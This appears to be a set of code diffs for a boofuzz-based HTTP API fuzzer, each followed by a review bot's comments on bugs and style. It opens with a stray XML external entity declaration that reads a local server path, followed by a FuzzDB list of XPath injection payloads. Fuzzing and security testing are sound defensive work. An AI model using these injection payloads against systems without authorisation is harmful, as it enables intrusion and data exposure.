<!DOCTYPE autofillupload [<!ENTITY D71Mn SYSTEM "file:///c:\inetpub">


@@ -0,0 +1,15 @@
# Source: FuzzDB (https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/xpath/xpath-injection.txt)
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1


@@ -0,0 +1,48 @@
import os
from fuzz_payloads import FuzzPayloads
class PayloadsLoader:
def __init__(self, hostname):
self.replacements = {"<<target_hostname>>": hostname}
def load_payloads(self, file_path: str, directory_name: str, keep_newlines: bool = False):
if file_path:
try:
with open(file_path, 'r', encoding="utf8") as custom_payloads_file_pointer:
for line in custom_payloads_file_pointer:
# Skip empty lines
if self._is_empty_or_comment(line):
continue
line = self._replace_target_hostname(line)
if not keep_newlines:
line = line.rstrip('\n').rstrip('\r\n')
FuzzPayloads.add_payload_to_list(line, directory_name)
# If there is some problem with file, just continue with the rest of payloads
except FileNotFoundError or IOError:
print("WARNING: Error when opening file: " + file_path)
def _replace_target_hostname(self, line: str):
for pattern, replacement_value in self.replacements.items():
line = line.replace(pattern, replacement_value)
return line
@staticmethod
def _is_empty_or_comment(line):
# Comment is every line which starts (without white spaces) with '#'
if len(line.strip()) == 0 or line.startswith("#"):
return True
def load_default_payloads(hostname: str):
loader = PayloadsLoader(hostname)
base_path = './fuzzer/src/payloads/lists/'
for root, directories, files in os.walk(base_path):
for file in files:
if file.endswith('.txt'):
directory_name = os.path.basename(os.path.normpath(root))
loader.load_payloads(os.path.join(root, file), directory_name)
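Review bot: `except FileNotFoundError or IOError:` at the end of load_payloads evaluates the `or` first, so the clause catches only FileNotFoundError and a permission error escapes even though the comment above says the loader should continue with the remaining payloads; write it as `except (FileNotFoundError, IOError):` or simply `except OSError:`, of which both are subclasses. A malformed byte sequence in a payload file raises UnicodeDecodeError, which none of these catch, so the "just continue" intent probably wants that case covered as well. Separately, `_is_empty_or_comment` falls off the end and returns None for an ordinary line, which works by truthiness but reads like a missing branch; `return len(line.strip()) == 0 or line.startswith("#")` states the same thing explicitly.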


@@ -0,0 +1,48 @@
import time
import json
from http.client import HTTPResponse
from boofuzz import exception
from configuration_manager import ConfigurationManager
from fake_socket import get_response_object
class PostTestCaseCallback(object):
@staticmethod
def post_test_callback(target, fuzz_data_logger, session, sock, *args, **kwargs):
fuzz_data_logger.log_info("Mutation: " + session.fuzz_node.mutant._rendered.decode('utf-8', errors='ignore'))
fuzz_data_logger.log_info("Original value: " + session.fuzz_node.mutant.original_value.decode('utf-8', errors='ignore'))
response_timeout = ConfigurationManager.config["response_timeout"]
polling_interval = ConfigurationManager.config["polling_interval"]
response_string = None
for _ in range(0, int(response_timeout / polling_interval)):
try:
response_string = target.recv()
break
except exception.BoofuzzTargetConnectionReset:
time.sleep(polling_interval)
continue
if not response_string:
fuzz_data_logger.log_fail("Timeout or closed connection")
return
response = get_response_object(response_string)
if get_response_object(response_string) is None:
fuzz_data_logger.log_fail("Bad HTTP header")
return
PostTestCaseCallback._http_response_asserts(response, fuzz_data_logger)
@staticmethod
def _http_response_asserts(response: HTTPResponse, fuzz_data_logger):
if response.status >= 500:
fuzz_data_logger.log_fail("Status code higher or equal than 500!")
if response.getheader("Content-Type") == "application/json":
try:
json.loads(response.read())
except ValueError:
fuzz_data_logger.log_fail("application/json body is not valid JSON structure")
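Review bot: The None check after `response = get_response_object(response_string)` calls the parser a second time instead of testing the value just stored, so the response is parsed twice and the guard is decoupled from the variable that is actually used; `if response is None:` is what is meant. The Content-Type comparison in `_http_response_asserts` is an exact string match, so a header such as `application/json; charset=utf-8` skips the JSON validity check entirely; compare the media type only, e.g. `content_type = (response.getheader("Content-Type") or "").split(";")[0].strip().lower()`. Also, `int(response_timeout / polling_interval)` gives zero iterations (and never calls `recv`) when the timeout is smaller than the polling interval and raises ZeroDivisionError when the interval is 0; validating those two config values where they are read, or clamping with `max(1, ...)`, would make the loop robust.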


@@ -0,0 +1,61 @@
import os
import threading
import sys
import datetime
from configuration_manager import ConfigurationManager
DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS = 5
def report_progress(session):
if did_fuzzing_already_started(session) > 0:
if is_fuzzing_hanged(session):
message = create_hanged_message(session)
print(message, file=sys.stderr)
os._exit(1)
if is_fuzzing_still_in_progress(session):
plan_another_report(session, ConfigurationManager.get_reporting_interval())
message = create_report_message(session)
print(message, file=sys.stderr)
else:
plan_another_report(session, DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS)
def plan_another_report(session, reporting_interval):
threading.Timer(reporting_interval, report_progress, [session]).start()
def did_fuzzing_already_started(session):
return session.total_num_mutations > 0
def is_fuzzing_hanged(session):
hanged = is_fuzzing_hanged.previous_mutant_index == session.total_mutant_index
is_fuzzing_hanged.previous_mutant_index = session.total_mutant_index
return hanged
is_fuzzing_hanged.previous_mutant_index = -1
def is_fuzzing_still_in_progress(session):
return session.total_num_mutations != session.total_mutant_index
def create_report_message(session):
percentage = session.total_mutant_index / session.total_num_mutations * 100
percentage = str(round(percentage, 2))
message = str(datetime.datetime.now()) + ": "
message += "Proceeded " + str(session.total_mutant_index) + " of "
message += str(session.total_num_mutations) + " (" + percentage + "%) test cases"
return message
def create_hanged_message(session):
test_case_number = str(session.total_mutant_index)
return "Fuzzing hangs on test case number: " + test_case_number + ". See log file for an error message."
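Review bot: `os._exit(1)` in report_progress terminates the interpreter from the timer thread without running `with`-block cleanup or `atexit` handlers, so any output still buffered by the main thread (for example a report file it holds open) can be lost or truncated exactly when a hang is being reported. The hang check also trips after a single reporting interval with no progress, so one test case whose response wait happens to exceed the interval is indistinguishable from a real hang; counting consecutive stalled checks (`if stalled_checks >= HANG_THRESHOLD:`) before exiting, and flushing the loggers first, would make the kill deliberate. Keeping the previous index as a function attribute (`is_fuzzing_hanged.previous_mutant_index = -1`) works but hides mutable state behind a function name; a module-level variable with a short comment, or a small reporter class, is easier to follow.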


@@ -0,0 +1,101 @@
import json
from boofuzz import s_static, s_size
from fuzz_payloads import s_http_string, s_http_number, s_http_boolean
from encodings_helper import EncodingTypes
from parameter import Parameter
class RequestBuildHelper(object):
# Content-length and Host are mandatory
@staticmethod
def generate_headers(config):
# Append headers from config
headers = config["headers"]
if headers is not None:
for key, value in headers.items():
s_static(key + ": " + value)
s_static("\r\n")
# Append host, if it is not provided in config
if not RequestBuildHelper._is_header_in_config(headers, "Host"):
s_static("Host: " + config["target"]["hostname"])
s_static("\r\n")
# Append content-length, if it is not provided in config
if not RequestBuildHelper._is_header_in_config(headers, "Content-Length"):
s_static('Content-Length: ')
# s_size calculates the byte length of Boofuzz block with name "body",
# which contains whole HTTP request content part. with actual mutation.
s_size("body", output_format="ascii", fuzzable=False)
@staticmethod
def _is_header_in_config(headers, header_name):
return headers is not None and header_name in headers
@staticmethod
def generate_uri(uri, uri_parameters, config, fuzzable=False):
fixed_attributes = config["fixed_url_attributes"] if "fixed_url_attributes" in config else None
id_generator = _unique_uri_attribute_id()
while True:
try:
# Find first not yet found parameter, if there is one
index = uri.index("{")
prefix = uri[0:index]
s_http_string(prefix, fuzzable=False, encoding=EncodingTypes.ascii)
uri = uri[index + 1:]
index = uri.index("}")
parameter_name = uri[0:index]
parameter: Parameter = RequestBuildHelper._get_parameter(parameter_name, fixed_attributes, uri_parameters)
name = "URI attribute, default value: " + parameter.value + ", id: " + next(id_generator)
is_part_fuzzable = fuzzable and not parameter.is_from_config
if parameter.data_type and (parameter.data_type == 'integer' or parameter.data_type == 'number'):
s_http_number(parameter.value, fuzzable=is_part_fuzzable, encoding=EncodingTypes.urlencoded, name=name)
elif parameter.data_type and parameter.data_type == 'string':
s_http_boolean(parameter.value, fuzzable=is_part_fuzzable, encoding=EncodingTypes.urlencoded, name=name)
else:
s_http_string(parameter.value, fuzzable=is_part_fuzzable, encoding=EncodingTypes.urlencoded, name=name)
uri = uri[index + 1:]
except ValueError:
if len(uri) > 0:
name = "URI attribute, default value: " + uri + ", id: " + next(id_generator)
s_http_string(uri, fuzzable=False, encoding=EncodingTypes.ascii, name=name)
break
# Getting parameter value from these sources (ordered):
# 1] Fixed attributes from config
# 2] Example value from documentation
# 3] Placeholder 'attribute'
@staticmethod
def _get_parameter(parameter_name, fixed_attributes, uri_parameters) -> Parameter:
if fixed_attributes is not None and parameter_name in fixed_attributes:
return Parameter(parameter_name, fixed_attributes[parameter_name], None, None, True)
elif any(parameter["Name"] == parameter_name for parameter in uri_parameters):
for parameter in uri_parameters:
if parameter["Name"] == parameter_name:
return Parameter(parameter_name, parameter["ExampleValue"], parameter["Type"], parameter["Format"], False)
else:
return Parameter(parameter_name, 'attribute', None, None, False)
@staticmethod
def is_string_valid_json(input_string: str) -> bool:
try:
json.loads(input_string)
return True
except ValueError:
return False
@staticmethod
def get_request_name(uri, method_type) -> str:
return uri + ", " + method_type
def _unique_uri_attribute_id():
sequence = 0
while True:
yield str(sequence)
sequence += 1
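Review bot: In generate_uri the `elif parameter.data_type and parameter.data_type == 'string'` branch calls `s_http_boolean`, while the final `else` — which is where string parameters otherwise land — calls `s_http_string`; the branch looks like it was meant to read `elif parameter.data_type == 'boolean':`, because as written a documented string attribute is fuzzed with boolean payloads and a boolean one with string payloads. The `parameter.data_type and parameter.data_type == ...` guards are redundant, since an equality test against None is already False. `_get_parameter` scans `uri_parameters` twice (`any` followed by the `for`); `next((p for p in uri_parameters if p["Name"] == parameter_name), None)` does it once, and `_unique_uri_attribute_id` is `map(str, itertools.count())`. The name built on the `"URI attribute, default value: " + parameter.value` line assumes `parameter.value` is a str, which a fixed attribute loaded from config as a number would violate with a TypeError; `str(parameter.value)` or an f-string avoids that.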

fuzzer/src/text_logger.py Normal file

@@ -0,0 +1,46 @@
from boofuzz import FuzzLoggerText, helpers
from fake_socket import get_response_object
class TextLogger(FuzzLoggerText):
def open_test_step(self, description):
self._print_log_msg(msg=description, msg_type='step')
def log_check(self, description):
self._print_log_msg(msg=description, msg_type='check')
def log_error(self, description):
self._print_log_msg(msg=description, msg_type='error')
# Log full response just when it is needed
def log_recv(self, data):
response = get_response_object(data)
if response is None or response.status >= 300:
self._print_log_msg(data=data, msg_type='receive')
else:
message = "Returned status code " + str(response.status) + ", received message omitted."
self._print_log_msg(msg=message, msg_type='info')
def log_send(self, data):
self._print_log_msg(data=data, msg_type='send')
def log_info(self, description):
pass
def open_test_case(self, test_case_id, name, index, *args, **kwargs):
self._print_log_msg(msg=test_case_id, msg_type='test_case')
def log_fail(self, description=""):
self._print_log_msg(msg=description, msg_type='fail')
def log_pass(self, description=""):
self._print_log_msg(msg=description, msg_type='pass')
def close_test_case(self):
print()
def close_test(self):
pass
def _print_log_msg(self, msg_type, msg=None, data=None):
print(helpers.format_log_msg(msg_type=msg_type, description=msg, data=data, indent_size=self.INDENT_SIZE))
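Review bot: `log_info` is an empty `pass` body with no comment, so a reader cannot tell whether info-level messages — the mutation and original value that the post-test callback emits through `log_info` — are dropped on purpose or the override is unfinished; if it is intentional, `# Deliberately silent: info-level output is too verbose for the text log` documents that. `_print_log_msg` always writes with a bare `print()`, so a file handle passed to the inherited FuzzLoggerText constructor would be ignored; either write to that handle or state in the class docstring that this logger is stdout-only.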


@@ -0,0 +1,113 @@
import unittest
import json
from boofuzz import *
from fuzzing_json_decoder import FuzzingJsonDecoder
from fuzz_payloads import FuzzPayloads
class FuzzingJsonDecoderTests(unittest.TestCase):
def setUp(self):
# Just init block for boofuzz
s_initialize(self.id())
# Generate at least few payloads for at least minimum number of mutations
FuzzPayloads.add_payload_to_list("payload 1", FuzzPayloads.CUSTOM_PAYLOADS_KEY)
FuzzPayloads.add_payload_to_list("payload 2", FuzzPayloads.CUSTOM_PAYLOADS_KEY)
def __json_equality_assertion(self, original_json, generated_json):
self.assertDictEqual(json.loads(original_json), json.loads(generated_json))
def test_empty_dict(self):
# Prepare
original_json = '{}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_empty_list(self):
# Prepare
original_json = '{"array": []}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_dict_primitives(self):
# Prepare
original_json = '{"array": [{"primitives": {"1": 1, "2": 1e1, "3": false, "4": null}}]}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_nested_dict(self):
# Prepare
original_json = '{ "problems": [{ "Diabetes":[{ "medications":[{ "medicationsClasses":[{ "className":[{ "associatedDrug":[{ "name":"asprin", "dose":"", "strength":"500 mg" }], "associatedDrug#2":[{ "name":"somethingElse", "dose":"", "strength":"500 mg" }] }], "className2":[{ "associatedDrug":[{ "name":"asprin", "dose":"", "strength":"500 mg" }], "associatedDrug#2":[{ "name":"somethingElse", "dose":"", "strength":"500 mg" }] }] }] }], "labs":[{ "missing_field": "missing_value" }] }], "Asthma":[{}] }]}'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_huge_dict(self):
# Prepare
original_json = ' { "medications":[{ "aceInhibitors":[{ "name":"lisinopril", "strength":"10 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "antianginal":[{ "name":"nitroglycerin", "strength":"0.4 mg Sublingual Tab", "dose":"1 tab", "route":"SL", "sig":"q15min PRN", "pillCount":"#30", "refills":"Refill 1" }], "anticoagulants":[{ "name":"warfarin sodium", "strength":"3 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "betaBlocker":[{ "name":"metoprolol tartrate", "strength":"25 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "diuretic":[{ "name":"furosemide", "strength":"40 mg Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }], "mineral":[{ "name":"potassium chloride ER", "strength":"10 mEq Tab", "dose":"1 tab", "route":"PO", "sig":"daily", "pillCount":"#90", "refills":"Refill 3" }] } ], "labs":[{ "name":"Arterial Blood Gas", "time":"Today", "location":"Main Hospital Lab" }, { "name":"BMP", "time":"Today", "location":"Primary Care Clinic" }, { "name":"BNP", "time":"3 Weeks", "location":"Primary Care Clinic" }, { "name":"BUN", "time":"1 Year", "location":"Primary Care Clinic" }, { "name":"Cardiac Enzymes", "time":"Today", "location":"Primary Care Clinic" }, { "name":"CBC", "time":"1 Year", "location":"Primary Care Clinic" }, { "name":"Creatinine", "time":"1 Year", "location":"Main Hospital Lab" }, { "name":"Electrolyte Panel", "time":"1 Year", "location":"Primary Care Clinic" }, { "name":"Glucose", "time":"1 Year", "location":"Main Hospital Lab" }, { "name":"PT/INR", "time":"3 Weeks", "location":"Primary Care Clinic" }, { "name":"PTT", "time":"3 Weeks", "location":"Coumadin Clinic" }, { "name":"TSH", "time":"1 Year", "location":"Primary Care Clinic" } ], "imaging":[{ "name":"Chest X-Ray", "time":"Today", "location":"Main Hospital Radiology" }, { "name":"Chest X-Ray", 
"time":"Today", "location":"Main Hospital Radiology" }, { "name":"Chest X-Ray", "time":"Today", "location":"Main Hospital Radiology" } ] }'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_dicts_in_array(self):
# Prepare
original_json = '{ "one": { "two": [{ "four": { "name": "four1_name" } }, { "four": { "name": "four2_name" } }] } }'
# Action
decoder = FuzzingJsonDecoder(False)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
def test_that_quotation_marks_are_not_added_into_default_values(self):
# Prepare
original_json = '{ "one": false, "two": 0 }'
# Action
decoder = FuzzingJsonDecoder(True)
decoder.decode_dict(json.loads(original_json))
decoder.generate_mutations()
generated_json = s_render()
# Assert
self.__json_equality_assertion(original_json, generated_json)
if __name__ == '__main__':
unittest.main()
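Review bot: Every test repeats the same decode/generate/render sequence followed by `__json_equality_assertion`; a single helper taking the JSON text and the quotation flag would leave each test with just its input and the call, and `from boofuzz import *` should be narrowed to `from boofuzz import s_initialize, s_render`, which is all the file uses. The double-underscore prefix on `__json_equality_assertion` triggers name mangling for no benefit; a single underscore is the usual convention for a private test helper.
```python
def _assert_roundtrip(self, original_json, add_quotation_marks=False):
    decoder = FuzzingJsonDecoder(add_quotation_marks)
    decoder.decode_dict(json.loads(original_json))
    decoder.generate_mutations()
    self.assertDictEqual(json.loads(original_json), json.loads(s_render()))

def test_empty_dict(self):
    self._assert_roundtrip('{}')

# … unchanged: remaining tests, each reduced to one _assert_roundtrip call …
```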


@@ -0,0 +1,68 @@
import unittest
import json
from json_schema_parser import generate_json_dict_from_schema
class FuzzingJsonDecoderTests(unittest.TestCase):
def test_single_bool_primitive(self):
# Prepare
original_json_schema = '{"test": {"Title": null,"Type": "boolean","Format": null,"Example": null}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue(isinstance(generated_json["test"], bool))
self.assertEqual(generated_json["test"], True)
def test_nested_string_primitive_with_example(self):
# Prepare
original_json_schema = '{"test": {"nested": {"Title": null,"Type": "string","Format": null,"Example": "example"}}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue("nested" in generated_json["test"])
self.assertTrue(isinstance(generated_json["test"]["nested"], str))
self.assertEqual(generated_json["test"]["nested"], "example")
def test_array_with_primitive(self):
# Prepare
original_json_schema = '{"test": {"Type": "array","ArrayItemSchema": {"Title": null,"Type": "number","Format": "double","Example": null}}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue(isinstance(generated_json["test"], list))
self.assertTrue(isinstance(generated_json["test"][0], float))
self.assertEqual(generated_json["test"][0], 0.0)
def test_array_with_complex_object(self):
# Prepare
original_json_schema = '{"test": {"Type": "array","ArrayItemSchema": {"nested1": {"Title": null,"Type": "string","Format": null,"Example": "example"},"nested2": {"Title": null,"Type": "integer","Format": null,"Example": null}}}}'
loaded_json_schema = json.loads(original_json_schema)
# Action
generated_json = generate_json_dict_from_schema(loaded_json_schema)
# Assert
self.assertTrue("test" in generated_json)
self.assertTrue(isinstance(generated_json["test"], list))
self.assertTrue(isinstance(generated_json["test"][0], dict))
self.assertTrue("nested1" in generated_json["test"][0])
self.assertTrue("nested2" in generated_json["test"][0])
self.assertEqual(generated_json["test"][0]["nested1"], "example")
self.assertEqual(generated_json["test"][0]["nested2"], 0)
if __name__ == '__main__':
unittest.main()
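Review bot: The test class is named `FuzzingJsonDecoderTests` although it exercises `generate_json_dict_from_schema`, and the same class name is already used by the decoder test module, which makes test reports ambiguous; `class JsonSchemaParserTests(unittest.TestCase):` fixes both. `self.assertTrue("test" in generated_json)` and `self.assertTrue(isinstance(...))` lose the offending values on failure; `self.assertIn("test", generated_json)` and `self.assertIsInstance(generated_json["test"], bool)` report them.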

fuzzer/src/wfuzz.py Normal file

@@ -0,0 +1,42 @@
import sys
import json
from fuzz_payloads import FuzzPayloads
from text_logger import TextLogger
from junit_logger import JUnitLogger
from payloads.payloads_loader import PayloadsLoader, load_default_payloads
from configuration_manager import ConfigurationManager
from fuzzer import Fuzzer
def main():
config_file_path = sys.argv[1]
endpoints_description = sys.argv[2]
junit_output = sys.argv[3]
custom_payloads_path = sys.argv[4] if len(sys.argv) == 5 else None
with open(config_file_path, 'r') as config_file_pointer:
ConfigurationManager(config_file_pointer)
target = ConfigurationManager.config["target"]
# Load and generate default payloads
load_default_payloads(target["hostname"])
# If user specified file with custom payloads, we add them to our mutations
payloads_loader = PayloadsLoader(target["hostname"])
payloads_loader.load_payloads(custom_payloads_path, FuzzPayloads.CUSTOM_PAYLOADS_KEY)
with open(junit_output, 'w', encoding='utf8') as junit_output_file_pointer:
text_logger = TextLogger()
junit_logger = JUnitLogger(junit_output_file_pointer, test_suite_name_delimiter=":", hostname=target["hostname"])
protocol = 'ssl' if target["ssl"] is True else 'tcp'
with open(endpoints_description, 'r') as endpoints_description_file_pointer:
endpoints = json.loads(endpoints_description_file_pointer.read())
fuzzer = Fuzzer(endpoints, [text_logger, junit_logger], protocol)
fuzzer.fuzz()
if __name__ == '__main__':
main()
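Review bot: main indexes `sys.argv[1]` through `sys.argv[3]` unconditionally, so running the tool with missing arguments dies with an IndexError instead of a usage line; a guard such as `if len(sys.argv) not in (4, 5): sys.exit("usage: wfuzz.py CONFIG ENDPOINTS JUNIT_OUTPUT [CUSTOM_PAYLOADS]")` before the reads (or argparse) would do. The config and endpoint files are opened without `encoding` while the JUnit output uses `encoding='utf8'`, so both JSON inputs are decoded with the platform default; `open(config_file_path, 'r', encoding='utf8')` keeps the three consistent. `target["ssl"] is True` silently falls back to plain tcp when the config carries the value as anything but a boolean (for example the string "true"); validating the type where the configuration is loaded would turn that into an explicit error.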